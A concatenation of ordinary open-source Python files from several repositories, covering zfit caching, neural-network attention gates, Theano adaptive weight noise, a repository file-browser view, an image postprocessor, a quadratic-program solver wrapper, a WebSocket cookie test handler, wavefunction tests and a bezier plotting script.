eval_func(graph, -1)
if __name__ == "__main__":
tf.compat.v1.app.run()
|
mpf/file_interfaces/__init__.py | Scottacus64/mpf | 163 | 12750203 | <filename>mpf/file_interfaces/__init__.py<gh_stars>100-1000
"""Contains config file interfaces."""
|
zfit/util/cache.py | nsahoo/zfit | 129 | 12750209 | <reponame>nsahoo/zfit<gh_stars>100-1000
"""Module for caching.
The basic concept of caching in Zfit builds on a "cacher", that caches a certain value and that
is dependent of "cache_dependents". By implementing `ZfitCachable`, an object will be able to play both
roles. And most importantly, it has a `_cache` dict, that contains all the cache.
Basic principle
===============
A "cacher" adds any dependents that it may comes across with `add_cache_dependents`. For example,
for a loss this would be all pdfs and data. Since :py:class:`~zfit.Space` is immutable, there is no need to add this
as a dependent. This leads to the "cache_dependent" to register the "cacher" and to remember it.
In case, any "cache_dependent" changes in a way the cache of itself (and any "cacher") is invalid,
which is done in the simplest case by decorating a method with `@invalidates_cache`, the "cache_dependent":
* clears it's own cache with `reset_cache_self` and
* "clears" any "cacher"s cache with `reset_cache(reseter=self)`, telling the "cacher" that it should
reset the cache. This is also where more fine-grained control (depending on which "cache_dependent"
calls `reset_cache`) can be brought into play.
Example with a pdf that caches the normalization:
.. code:: python
class Parameter(Cachable):
def load(new_value): # does not require to build a new graph
# do something
@invalidates_cache
def change_limits(new_limits): # requires to build a new graph (as an example)
# do something
# create param1, param2 from `Parameter`
class MyPDF(Cachable):
def __init__(self, param1, param2):
self.add_cache_dependents([param1, param2])
def cached_func(...):
if self._cache.get('my_name') is None:
result = ... # calculations here
self._cache['my_name']
else:
result = self._cache['my_name']
return result
"""
# Copyright (c) 2021 zfit
import functools
import weakref
from abc import abstractmethod
from typing import Iterable, Mapping, Union
import numpy as np
import tensorflow as tf
from . import ztyping
from .container import convert_to_container
class ZfitGraphCachable:
@abstractmethod
def register_cacher(self, cacher: "ZfitGraphCachable"):
raise NotImplementedError
@abstractmethod
def add_cache_deps(self, cache_dependents, allow_non_cachable):
"""Add dependents that render the cache invalid if they change.
Args:
cache_dependents:
allow_non_cachable: If `True`, allow `cache_dependents` to be non-cachables.
If `False`, any `cache_dependents` that is not a `ZfitCachable` will raise an error.
Raises:
TypeError: if one of the `cache_dependents` is not a `ZfitCachable` _and_ `allow_non_cachable`
if `False`.
"""
pass
@abstractmethod
def reset_cache_self(self):
"""Clear the cache of self and all dependent cachers."""
pass
@abstractmethod
def reset_cache(self, reseter):
pass
class GraphCachable(ZfitGraphCachable):
graph_caching_methods = []
instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
self._cache = {}
self._cachers = weakref.WeakKeyDictionary()
self.reset_cache_self()
self.instances.add(self)
super().__init__(*args, **kwargs)
def __init_subclass__(cls) -> None:
super().__init_subclass__()
graph_caching_methods = []
for func_name in dir(cls):
if not func_name.startswith("__"):
func = getattr(cls, func_name)
if callable(func) and hasattr(func, 'zfit_graph_cache_registered'):
# assert hasattr(func, "_descriptor_cache"), "TensorFlow internals have changed. Need to update cache"
func.zfit_graph_cache_registered = True
graph_caching_methods.append(func)
cls.graph_caching_methods = graph_caching_methods
def register_cacher(self, cacher: ztyping.CacherOrCachersType):
"""Register a `cacher` that caches values produces by this instance; a dependent.
Args:
cacher:
"""
if not isinstance(cacher, ZfitGraphCachable):
raise TypeError(f"`cacher` is not a `ZfitCachable` but {type(cacher)}")
if not cacher in self._cachers:
self._cachers[cacher] = None # could we have a more useful value?
def add_cache_deps(self, cache_deps: ztyping.CacherOrCachersType, allow_non_cachable: bool = True):
"""Add dependencies that render the cache invalid if they change.
Args:
cache_deps:
allow_non_cachable: If `True`, allow `cache_dependents` to be non-cachables.
If `False`, any `cache_dependents` that is not a `ZfitCachable` will raise an error.
Raises:
TypeError: if one of the `cache_dependents` is not a `ZfitCachable` _and_ `allow_non_cachable`
if `False`.
"""
cache_deps = convert_to_container(cache_deps)
for cache_dep in cache_deps:
if isinstance(cache_dep, ZfitGraphCachable):
cache_dep.register_cacher(self)
elif not allow_non_cachable:
raise TypeError("cache_dependent {} is not a `ZfitCachable` but {}".format(cache_dep,
type(cache_dep)))
def reset_cache_self(self):
"""Clear the cache of self and all dependent cachers."""
self._clean_cache()
self._inform_cachers()
def reset_cache(self, reseter: 'ZfitGraphCachable'):
self.reset_cache_self()
def _clean_cache(self):
# for func_holder in self.graph_caching_methods:
# func_holder.reset
self._cache = {}
return
def _inform_cachers(self):
for cacher in self._cachers:
cacher.reset_cache(reseter=self)
def invalidate_graph(func):
@functools.wraps(func)
def wrapped_func(*args, **kwargs):
self = args[0]
if not isinstance(self, ZfitGraphCachable):
raise TypeError("Decorator can only be used in a subclass of `ZfitCachable`")
self.reset_cache(reseter=self)
return func(*args, **kwargs)
return wrapped_func
class FunctionCacheHolder(GraphCachable):
IS_TENSOR = object()
def __init__(self, func, wrapped_func,
cachables: Union[ZfitGraphCachable, object, Iterable[Union[ZfitGraphCachable, object]]] = None,
cachables_mapping=None):
"""`tf.function` decorated function holder with caching dependencies on inputs.
A `tf.function` creates a new graph for every signature that is encountered. It automatically caches them but
thereby assumes that Python objects are immutable. Any mutation won't be detected. Therefore, an extra wrapper
is needed. The input signature is compared with firstly checking whether the function is the same and then
doing an equal comparison of the arguments (maybe too costly?).
The `FunctionCacheHolder` holds the
- original python function which serves as the hash of the object
- wrapped python function, `wrapped_func`
- the (keyword-)arguments
If any of the keyword arguments changes in a way that the graph cache is invalid, this holder will have
`is_valid` set to False and the `wrapped_func` cannot be used anymore, instead a new `tf.function` should
be created as a call to the `wrapped_func` with the given arguments will result in an outdated graph.
Args:
func: Python function that serves as a hash of the holder. Notice that equality is different
defined.
wrapped_func: Wrapped `func` with `tf.function`. The holder signals via
`is_valid` whether this function is still valid to be used.
cachables: objects that are cached. If they change, the cache is invalidated
cachables_mapping: keyword arguments to the function. If the values change, the cache is
invalidated.
"""
# cache = {} if cache is None else cache
self.delete_from_cache = False
self.wrapped_func = wrapped_func
# self.parent_cache = cache
self.python_func = func
self._hash_value = hash(self.python_func)
if cachables is None and cachables_mapping is None:
raise ValueError("Both `cachables and `cachables_mapping` are None. One needs to be different from None.")
if cachables is None:
cachables = []
if cachables_mapping is None:
cachables_mapping = {}
cachables = convert_to_container(cachables, container=list)
cachables_values = convert_to_container(cachables_mapping.values(), container=list)
cachables_all = cachables + cachables_values
self.immutable_representation = self.create_immutable(cachables, cachables_mapping)
# self._hash_value = hash(self.immutable_representation)
super().__init__() # resets the cache
self.add_cache_deps(cachables_all)
self.is_valid = True # needed to make the cache valid again
def reset_cache_self(self):
self.is_valid = False
def create_immutable(self, args, kwargs):
"""Create a tuple of the args and kwargs by combining them as args + kwargs.keys() + kwargs.values()`
Args:
args: list like
kwargs: dict-like
Returns:
"""
# is initialized before the core
from ..core.interfaces import ZfitData, ZfitParameter, ZfitSpace
args = list(args)
kwargs = list(kwargs.keys()) + list(kwargs.values())
combined = []
if args != []:
combined += args
if kwargs != []:
combined += args
combined_cleaned = []
for obj in combined:
if isinstance(obj, ZfitData):
obj = (id(obj),)
elif isinstance(obj, ZfitParameter):
obj = (ZfitParameter, obj.name)
elif isinstance(obj, ZfitSpace):
obj = (id(obj),)
elif tf.is_tensor(obj):
obj = self.IS_TENSOR
elif isinstance(obj, np.ndarray):
obj = (obj,) if sum(obj.shape) < 20 else id(obj)
combined_cleaned.append(obj)
return tuple(combined_cleaned)
def __hash__(self) -> int:
return self._hash_value
def __eq__(self, other: object) -> bool:
if not isinstance(other, FunctionCacheHolder):
return False
# return all(obj1 == obj2 for obj1, obj2 in zip(self.immutable_representation, other.immutable_representation))
array_repr_self = np.array(self.immutable_representation, dtype=object)
array_repr_other = np.array(other.immutable_representation, dtype=object)
try:
return all(np.equal(array_repr_self, array_repr_other))
except ValueError: # broadcasting does not work
return False
except TypeError: # OperatorNotAllowedError inherits from this
return False
# TODO: activate the below? costly, but runs?
# except OperatorNotAllowedInGraphError: # we have to assume they're not the same
# return False
def __repr__(self) -> str:
return f"<FunctionCacheHolder: {self.python_func}, valid={self.is_valid}>"
def clear_graph_cache():
from zfit.z.zextension import FunctionWrapperRegistry
for registry in FunctionWrapperRegistry.registries:
for all_meth in registry.function_cache.values():
for wrapped_meth in all_meth:
wrapped_meth = wrapped_meth.wrapped_func
wrapped_meth._created_variables = None
wrapped_meth._stateful_fn = None
wrapped_meth._stateless_fn = None
wrapped_meth._descriptor_cache.clear()
for registry in FunctionWrapperRegistry.registries:
registry.reset()
for instance in GraphCachable.instances:
instance.reset_cache('global')
# Cachable.graph_caching_methods.clear()
tf.compat.v1.reset_default_graph()
|
models/gates.py | xxxnell/how-do-vits-work | 438 | 12750225 | <reponame>xxxnell/how-do-vits-work
"""
This model is based on the implementation of https://github.com/Jongchan/attention-module.
"""
from functools import partial
import torch
import torch.nn as nn
from einops import reduce, rearrange
import models.layers as layers
class ChannelGate(nn.Module):
def __init__(self, channel, reduction=16, max_pool=True):
super().__init__()
self.pools = []
self.pools.append(nn.AdaptiveAvgPool2d((1, 1)))
self.pools.append(nn.AdaptiveMaxPool2d((1, 1)))
self.pools = self.pools if max_pool else self.pools[:1]
self.ff = nn.Sequential(
layers.dense(channel, channel // reduction, bias=False),
layers.relu(),
layers.dense(channel // reduction, channel, bias=False),
)
self.prob = nn.Sigmoid()
def forward(self, x):
b, c, h, w = x.shape
s = torch.cat([pool(x) for pool in self.pools], dim=-1)
s = rearrange(s, "b c n m -> b (n m) c")
s = self.ff(s)
s = reduce(s, "b n c -> b c", "mean")
s = self.prob(s)
s = s.view(b, c, 1, 1)
return x * s
class SpatialGate(nn.Module):
def __init__(self, kernel_size=7, max_pool=True):
super().__init__()
self.pools = []
self.pools.append(partial(torch.mean, dim=1, keepdim=True))
self.pools.append(lambda x: partial(torch.max, dim=1, keepdim=True)(x)[0])
self.pools = self.pools if max_pool else self.pools[:1]
self.ff = nn.Sequential(
layers.convnxn(len(self.pools), 1, kernel_size=7, stride=1, padding=(kernel_size - 1) // 2),
layers.bn(1)
)
self.prob = nn.Sigmoid()
def forward(self, x):
s = torch.cat([pool(x) for pool in self.pools], dim=1)
s = self.ff(s)
s = self.prob(s)
return x * s
|
lvsr/graph.py | dendisuhubdy/attention-lvcsr | 295 | 12750232 | '''
Functions similar to blocks.graph
'''
import logging
import numpy
import theano
from theano import tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams
from blocks.config import config
from blocks.bricks.base import Brick, application
from picklable_itertools.extras import equizip
from blocks.graph import ComputationGraph
from collections import OrderedDict
logger = logging.getLogger(__name__)
class NoiseBrick(Brick):
"""
A brick to hold parameters introducd by adaptive noise.
For each model parameter, adaptive noise adds its standard deviations.
These new parameters will be held by this brick.
Do not use this brick directly! Its main purpose is to hold noise
parameters and to wrap the new cost.
"""
def __init__(self):
super(NoiseBrick, self).__init__(name='adaptive_noise')
self.parameters = []
self.allocated = True
self.initialized = True
@application(inputs=['train_cost', 'model_cost',
'model_prior_mean', 'model_prior_variance'],
outputs=['total_cost'])
def apply(self, application_call, train_cost, model_cost,
model_prior_mean, model_prior_variance):
# We need to add those as auxiliary variables, as they are not
# used to compute the output, and therefore are lost
application_call.add_auxiliary_variable(model_prior_mean.copy(),
name='model_prior_mean')
application_call.add_auxiliary_variable(model_prior_variance.copy(),
name='model_prior_variance')
total_cost = train_cost + model_cost
total_cost.name = 'total_cost'
return total_cost
def __get_name(param):
brick = None
for annotation in param.tag.annotations:
if isinstance(annotation, Brick):
brick = annotation
break
brick_hierarchy = [brick]
while brick_hierarchy[-1].parents:
brick_hierarchy.append(brick_hierarchy[-1].parents[0])
name = "{}.{}".format('/'.join((b.name for b in brick_hierarchy[::-1])),
param.name)
return name
def apply_adaptive_noise(computation_graph,
cost,
variables,
num_examples,
parameters=None,
init_sigma=1e-6,
model_cost_coefficient=1.0,
seed=None,
gradients=None,
):
"""Add adaptive noise to parameters of a model.
Each of the given variables will be replaced by a normal
distribution with learned mean and standard deviation.
A model cost is computed based on the precision of the the distributions
associated with each variable. It is added to the given cost used to
train the model.
See: <NAME> "Practical Variational Inference for Neural Networks",
NIPS 2011
Parameters
----------
computation_graph : instance of :class:`ComputationGraph`
The computation graph.
cost : :class:`~tensor.TensorVariable`
The cost without weight noise. It should be a member of the
computation_graph.
variables : :class:`~tensor.TensorVariable`
Variables to add noise to.
num_examples : int
Number of training examples. The cost of the model is divided by
the number of training examples, please see
<NAME> "Practical Variational Inference for Neural Networks"
for justification
parameters : list of :class:`~tensor.TensorVariable`
parameters of the model, if gradients are given the list will not
be used. Otherwise, it will be used to compute the gradients
init_sigma : float,
initial standard deviation of noise variables
model_cost_coefficient : float,
the weight of the model cost
seed : int, optional
The seed with which
:class:`~theano.sandbox.rng_mrg.MRG_RandomStreams` is initialized,
is set to 1 by default.
gradients : dict, optional
Adaptive weight noise introduces new parameters for which new cost
and gradients must be computed. Unless the gradients paramter is
given, it will use theano.grad to get the gradients
Returns
-------
cost : :class:`~tensor.TensorVariable`
The new cost
computation_graph : instance of :class:`ComputationGraph`
new graph with added noise.
gradients : dict
a dictionary of gradients for all parameters: the original ones
and the adaptive noise ones
noise_brick : :class:~lvsr.graph.NoiseBrick
the brick that holds all noise parameters and whose .apply method
can be used to find variables added by adaptive noise
"""
if not seed:
seed = config.default_seed
rng = MRG_RandomStreams(seed)
try:
cost_index = computation_graph.outputs.index(cost)
except ValueError:
raise ValueError("cost is not part of the computation_graph")
if gradients is None:
if parameters is None:
raise ValueError("Either gradients or parameters must be given")
logger.info("Taking the cost gradient")
gradients = dict(equizip(parameters,
tensor.grad(cost, parameters)))
else:
if parameters is not None:
logger.warn("Both gradients and parameters given, will ignore"
"parameters")
parameters = gradients.keys()
gradients = OrderedDict(gradients)
log_sigma_scale = 2048.0
P_noisy = variables # We will add noise to these
Beta = [] # will hold means, log_stdev and stdevs
P_with_noise = [] # will hold parames with added noise
# These don't change
P_clean = list(set(parameters).difference(P_noisy))
noise_brick = NoiseBrick()
for p in P_noisy:
p_u = p
p_val = p.get_value(borrow=True)
p_ls2 = theano.shared((numpy.zeros_like(p_val) +
numpy.log(init_sigma) * 2. / log_sigma_scale
).astype(dtype=numpy.float32))
p_ls2.name = __get_name(p_u)
noise_brick.parameters.append(p_ls2)
p_s2 = tensor.exp(p_ls2 * log_sigma_scale)
Beta.append((p_u, p_ls2, p_s2))
p_noisy = p_u + rng.normal(size=p_val.shape) * tensor.sqrt(p_s2)
p_noisy = tensor.patternbroadcast(p_noisy, p.type.broadcastable)
P_with_noise.append(p_noisy)
# compute the prior mean and variation
temp_sum = 0.0
temp_param_count = 0.0
for p_u, unused_p_ls2, unused_p_s2 in Beta:
temp_sum = temp_sum + p_u.sum()
temp_param_count = temp_param_count + p_u.shape.prod()
prior_u = tensor.cast(temp_sum / temp_param_count, 'float32')
temp_sum = 0.0
for p_u, unused_ls2, p_s2 in Beta:
temp_sum = temp_sum + (p_s2).sum() + (((p_u-prior_u)**2).sum())
prior_s2 = tensor.cast(temp_sum/temp_param_count, 'float32')
# convert everything to use the noisy parameters
full_computation_graph = ComputationGraph(computation_graph.outputs +
gradients.values())
full_computation_graph = full_computation_graph.replace(
dict(zip(P_noisy, P_with_noise)))
LC = 0.0 # model cost
for p_u, p_ls2, p_s2 in Beta:
LC = (LC +
0.5 * ((tensor.log(prior_s2) - p_ls2 * log_sigma_scale).sum()) +
1.0 / (2.0 * prior_s2) * (((p_u - prior_u)**2) + p_s2 - prior_s2
).sum()
)
LC = LC / num_examples * model_cost_coefficient
train_cost = noise_brick.apply(
full_computation_graph.outputs[cost_index].copy(), LC,
prior_u, prior_s2)
gradients = OrderedDict(
zip(gradients.keys(),
full_computation_graph.outputs[-len(gradients):]))
#
# Delete the gradients form the computational graph
#
del full_computation_graph.outputs[-len(gradients):]
new_grads = {p: gradients.pop(p) for p in P_clean}
#
# Warning!!!
# This only works for batch size 1 (we want that the sum of squares
# be the square of the sum!
#
diag_hessian_estimate = {p: g**2 for p, g in gradients.iteritems()}
for p_u, p_ls2, p_s2 in Beta:
p_grad = gradients[p_u]
p_u_grad = (model_cost_coefficient * (p_u - prior_u) /
(num_examples*prior_s2) + p_grad)
p_ls2_grad = (numpy.float32(model_cost_coefficient *
0.5 / num_examples * log_sigma_scale) *
(p_s2/prior_s2 - 1.0) +
(0.5*log_sigma_scale) * p_s2 * diag_hessian_estimate[p_u]
)
new_grads[p_u] = p_u_grad
new_grads[p_ls2] = p_ls2_grad
return train_cost, full_computation_graph, new_grads, noise_brick
|
vilya/views/uis/browsefiles.py | mubashshirjamal/code | 1,582 | 12750235 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
from vilya.libs.template import st
from vilya.models.project import CodeDoubanProject
_q_exports = []
class BrowsefilesUI:
_q_exports = ['setting']
def __init__(self, proj_name):
self.proj = proj_name
def _q_access(self, request):
if 'json' in request.environ['HTTP_ACCEPT']:
self.output = 'json'
else:
self.output = 'html'
def _q_index(self, request):
project = CodeDoubanProject.get_by_name(self.proj)
user = request.user
path = request.get_form_var('path', '')
rev = request.get_form_var('rev', project.default_branch)
allfiles = project.repo.get_tree(rev, path=path)
allfiles = [_add_file_type_and_warns(f) for f in allfiles]
errors = ''
project_name = self.proj
project = CodeDoubanProject.get_by_name(project_name)
ref = rev
if ref is None:
ref = project.default_branch
branches = project.repo.branches
tags = project.repo.tags
ref_type = 'branch' if ref in branches else 'tag' \
if ref in tags else 'tree'
if self.output == 'json':
return json.dumps(allfiles)
else:
return st('browsefiles.html', **locals())
def _add_file_type_and_warns(node):
code_file_exts = 'py rb c h html mako ptl js css less handlebars coffee sql'.split() # noqa
bad_exts = 'pyc exe'.split()
node_ext = node['path'].rsplit('.')[1] if '.' in node['path'] else ''
if node['type'] == 'tree':
icon_type = 'directory'
elif node['type'] == 'commit':
icon_type = 'submodule'
elif node_ext in code_file_exts:
icon_type = 'code-file'
else:
icon_type = 'text-file'
node['icon-type'] = icon_type
if node_ext in bad_exts:
node['warn'] = 'bad'
else:
node['warn'] = 'no'
return node
|
tools/accuracy_checker/openvino/tools/accuracy_checker/postprocessor/resize_style_transfer.py | TolyaTalamanov/open_model_zoo | 2,201 | 12750238 | <reponame>TolyaTalamanov/open_model_zoo<gh_stars>1000+
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
from PIL import Image
from ..postprocessor import Postprocessor
from ..representation import StyleTransferAnnotation, StyleTransferPrediction
from ..config import NumberField
from ..utils import get_size_from_config
class ResizeStyleTransfer(Postprocessor):
__provider__ = 'resize_style_transfer'
annotation_types = (StyleTransferAnnotation, )
prediction_types = (StyleTransferPrediction, )
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters.update({
'dst_width': NumberField(
value_type=int, optional=False, min_value=1, description="Destination width for resizing."
),
'dst_height': NumberField(
value_type=int, optional=False, min_value=1, description="Destination height for resizing."
)
})
return parameters
def configure(self):
self.dst_height, self.dst_width = get_size_from_config(self.config, allow_none=True)
def process_image(self, annotation, prediction):
for target in annotation:
if target is None:
continue
data = Image.fromarray(target.value)
data = data.resize((self.dst_width, self.dst_height), Image.BICUBIC)
target.value = np.array(data)
return annotation, prediction
|
pandapower/pypower/qps_pypower.py | yougnen/pandapower | 104 | 12750251 | # Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Quadratic Program Solver for PYPOWER.
"""
import sys
from pandapower.pypower.qps_pips import qps_pips
#from pandapower.pypower.qps_ipopt import qps_ipopt
#from pandapower.pypower.qps_cplex import qps_cplex
#from pandapower.pypower.qps_mosek import qps_mosek
#from pandapower.pypower.qps_gurobi import qps_gurobi
from pandapower.pypower.util import have_fcn
def qps_pypower(H, c=None, A=None, l=None, u=None, xmin=None, xmax=None,
x0=None, opt=None):
"""Quadratic Program Solver for PYPOWER.
A common wrapper function for various QP solvers.
Solves the following QP (quadratic programming) problem::
min 1/2 x'*H*x + c'*x
x
subject to::
l <= A*x <= u (linear constraints)
xmin <= x <= xmax (variable bounds)
Inputs (all optional except C{H}, C{c}, C{A} and C{l}):
- C{H} : matrix (possibly sparse) of quadratic cost coefficients
- C{c} : vector of linear cost coefficients
- C{A, l, u} : define the optional linear constraints. Default
values for the elements of C{l} and C{u} are -Inf and Inf,
respectively.
- C{xmin}, C{xmax} : optional lower and upper bounds on the
C{x} variables, defaults are -Inf and Inf, respectively.
- C{x0} : optional starting value of optimization vector C{x}
- C{opt} : optional options structure with the following fields,
all of which are also optional (default values shown in parentheses)
- C{alg} (0) - determines which solver to use
- 0 = automatic, first available of BPMPD_MEX, CPLEX,
Gurobi, PIPS
- 100 = BPMPD_MEX
- 200 = PIPS, Python Interior Point Solver
pure Python implementation of a primal-dual
interior point method
- 250 = PIPS-sc, a step controlled variant of PIPS
- 300 = Optimization Toolbox, QUADPROG or LINPROG
- 400 = IPOPT
- 500 = CPLEX
- 600 = MOSEK
- 700 = Gurobi
- C{verbose} (0) - controls level of progress output displayed
- 0 = no progress output
- 1 = some progress output
- 2 = verbose progress output
- C{max_it} (0) - maximum number of iterations allowed
- 0 = use algorithm default
- C{bp_opt} - options vector for BP
- C{cplex_opt} - options dict for CPLEX
- C{grb_opt} - options dict for gurobipy
- C{ipopt_opt} - options dict for IPOPT
- C{pips_opt} - options dict for L{qps_pips}
- C{mosek_opt} - options dict for MOSEK
- C{ot_opt} - options dict for QUADPROG/LINPROG
- C{problem} : The inputs can alternatively be supplied in a single
C{problem} dict with fields corresponding to the input arguments
described above: C{H, c, A, l, u, xmin, xmax, x0, opt}
Outputs:
- C{x} : solution vector
- C{f} : final objective function value
- C{exitflag} : exit flag
- 1 = converged
- 0 or negative values = algorithm specific failure codes
- C{output} : output struct with the following fields:
- C{alg} - algorithm code of solver used
- (others) - algorithm specific fields
- C{lmbda} : dict containing the Langrange and Kuhn-Tucker
multipliers on the constraints, with fields:
- C{mu_l} - lower (left-hand) limit on linear constraints
- C{mu_u} - upper (right-hand) limit on linear constraints
- C{lower} - lower bound on optimization variables
- C{upper} - upper bound on optimization variables
Example from U{http://www.uc.edu/sashtml/iml/chap8/sect12.htm}:
>>> from numpy import array, zeros, Inf
>>> from scipy.sparse import csr_matrix
>>> H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9],
... [4.3, 2.2, 2.1, 3.9],
... [6.3, 2.1, 3.5, 4.8],
... [5.9, 3.9, 4.8, 10 ]]))
>>> c = zeros(4)
>>> A = csr_matrix(array([[1, 1, 1, 1 ],
... [0.17, 0.11, 0.10, 0.18]]))
>>> l = array([1, 0.10])
>>> u = array([1, Inf])
>>> xmin = zeros(4)
>>> xmax = None
>>> x0 = array([1, 0, 0, 1])
>>> solution = qps_pips(H, c, A, l, u, xmin, xmax, x0)
>>> round(solution["f"], 11) == 1.09666678128
True
>>> solution["converged"]
True
>>> solution["output"]["iterations"]
10
@author: <NAME> (PSERC Cornell)
"""
if opt is None:
opt = {}
# if x0 is None:
# x0 = array([])
# if xmax is None:
# xmax = array([])
# if xmin is None:
# xmin = array([])
## default options
if 'alg' in opt:
alg = opt['alg']
else:
alg = 0
if 'verbose' in opt:
verbose = opt['verbose']
else:
verbose = 0
##----- call the appropriate solver -----
# if alg == 0 or alg == 200 or alg == 250: ## use MIPS or sc-MIPS
## set up options
if 'pips_opt' in opt:
pips_opt = opt['pips_opt']
else:
pips_opt = {}
if 'max_it' in opt:
pips_opt['max_it'] = opt['max_it']
if alg == 200:
pips_opt['step_control'] = False
else:
pips_opt['step_control'] = True
pips_opt['verbose'] = verbose
## call solver
x, f, eflag, output, lmbda = \
qps_pips(H, c, A, l, u, xmin, xmax, x0, pips_opt)
# elif alg == 400: ## use IPOPT
# x, f, eflag, output, lmbda = \
# qps_ipopt(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 500: ## use CPLEX
# x, f, eflag, output, lmbda = \
# qps_cplex(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 600: ## use MOSEK
# x, f, eflag, output, lmbda = \
# qps_mosek(H, c, A, l, u, xmin, xmax, x0, opt)
# elif 700: ## use Gurobi
# x, f, eflag, output, lmbda = \
# qps_gurobi(H, c, A, l, u, xmin, xmax, x0, opt)
# else:
# print('qps_pypower: {} is not a valid algorithm code\n'.format(alg))
if 'alg' not in output:
output['alg'] = alg
return x, f, eflag, output, lmbda |
websockets/handlers/set-cookies-samesite_wsh.py | ziransun/wpt | 575 | 12750270 | <filename>websockets/handlers/set-cookies-samesite_wsh.py
from six.moves import urllib
def web_socket_do_extra_handshake(request):
url_parts = urllib.parse.urlsplit(request.uri)
max_age = ""
if "clear" in url_parts.query:
max_age = "; Max-Age=0"
value = "1"
if "value" in url_parts.query:
value = urllib.parse.parse_qs(url_parts.query)["value"][0]
cookies = [
"samesite-unspecified={}; Path=/".format(value) + max_age,
"samesite-lax={}; Path=/; SameSite=Lax".format(value) + max_age,
"samesite-strict={}; Path=/; SameSite=Strict".format(value) + max_age,
# SameSite=None cookies must be Secure.
"samesite-none={}; Path=/; SameSite=None; Secure".format(value) + max_age
]
for cookie in cookies:
request.extra_headers.append(("Set-Cookie", cookie))
def web_socket_transfer_data(request):
# Expect close() from user agent.
request.ws_stream.receive_message()
|
moldesign/_tests/test_wfn.py | Autodesk/molecular-design-toolkit | 147 | 12750271 | <filename>moldesign/_tests/test_wfn.py
import pytest
import numpy as np
import moldesign as mdt
from moldesign import units as u
from moldesign.interfaces.pyscf_interface import basis_values
from .molecule_fixtures import *
from . import helpers
__PYTEST_MARK__ = 'wfn'
TESTSYSTEMS = ['h2_rhf_augccpvdz', 'h2_rhf_sto3g', 'acetylene_dft_631g']
def test_pyscf_orbital_grid_works(h2_rhf_augccpvdz):
""" Tests the basic input/output of the pyscf basis_values function
Doesn't actually test the values directly - just that the answers are mathematically consistent
"""
mol = h2_rhf_augccpvdz
wfn = mol.wfn
nbasis = len(wfn.aobasis)
coords = u.array([mol.com,
np.zeros(3)*u.angstrom,
10.0 * np.ones(3) * u.angstrom,
np.ones(3)*u.nm])
# First - check that the shape is appropriate if called without orbital coefficients
values_nocoeffs = basis_values(mol, wfn.aobasis, coords)
assert values_nocoeffs.shape == (len(coords), nbasis)
assert (values_nocoeffs[-1] == values_nocoeffs[-2]).all() # these 2 coordinates are the same
# Second - explicitly send orbital coefficients for first 2 basis functions
coeffs = np.zeros((2, nbasis))
coeffs[:2, :2] = np.identity(2)
vals_b0 = basis_values(mol, wfn.aobasis, coords, coeffs=coeffs)
assert vals_b0.shape == (len(coords), len(coeffs))
np.testing.assert_allclose(values_nocoeffs[:,:2], vals_b0)
# Third - send symmetric and anti-symmetric combinations of basis functions and check answers
plusminus = np.zeros((2, nbasis))
plusminus[:2, :2] = 1.0 / np.sqrt(2)
plusminus[1,1] = -1.0 / np.sqrt(2)
vals_plusminus = basis_values(mol, wfn.aobasis, coords, coeffs=plusminus)
assert vals_plusminus.shape == (len(coords), len(coeffs))
helpers.assert_almost_equal(vals_plusminus[:,0],
(vals_b0[:,0] + vals_b0[:,1])/np.sqrt(2))
helpers.assert_almost_equal(vals_plusminus[:,1],
(vals_b0[:,0] - vals_b0[:,1])/np.sqrt(2))
@pytest.mark.parametrize('molkey', TESTSYSTEMS)
def test_basis_function_3d_grids_same_in_pyscf_and_mdt(molkey, request):
mol = request.getfixturevalue(molkey)
randocoords = 6.0 * u.angstrom * (np.random.rand(200, 3) - 0.5)
pyscf_vals = basis_values(mol, mol.wfn.aobasis, randocoords)
with np.errstate(under='ignore'):
mdt_vals = mol.wfn.aobasis(randocoords)
helpers.assert_almost_equal(mdt_vals, pyscf_vals, decimal=5)
@pytest.mark.parametrize('molkey', ['h2_rhf_augccpvdz', 'h2_rhf_sto3g'])
@pytest.mark.screening
def test_pyscf_basis_function_space_integral_normalized(molkey, request):
mol = request.getfixturevalue(molkey)
grid = mdt.mathutils.padded_grid(mol.positions, 8.0 * u.angstrom, npoints=150)
points = grid.allpoints()
pyscf_vals = basis_values(mol, mol.wfn.aobasis, points)
assert pyscf_vals.shape == (len(points), len(mol.wfn.aobasis))
pyscf_normsqr = (pyscf_vals ** 2).sum(axis=0) * grid.dx * grid.dy * grid.dz
helpers.assert_almost_equal(pyscf_normsqr, 1.0,
decimal=4)
|
tests/functional/make_triangle_locate_images.py | dibir-magomedsaygitov/bezier | 165 | 12750283 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import matplotlib.pyplot as plt
import seaborn
from bezier import _plot_helpers
from tests.functional import test_triangle_locate
from tests.functional import utils
def make_plot(triangle_index, point_index, save_plot):
triangle = test_triangle_locate.TRIANGLES[triangle_index]
point = test_triangle_locate.POINTS[:, [point_index]]
name = f"test_triangle{triangle_index}_and_point{point_index}"
ax = triangle.plot(64)
ax.plot(
point[0, :], point[1, :], color="black", marker="o", linestyle="None"
)
ax.axis("scaled")
_plot_helpers.add_plot_boundary(ax)
if save_plot:
utils.save_fig(name)
else:
plt.title(name.replace("_", r"\_"))
plt.show()
plt.close(ax.figure)
def main():
parser = utils.get_parser()
args = parser.parse_args()
for case in test_triangle_locate.CASES:
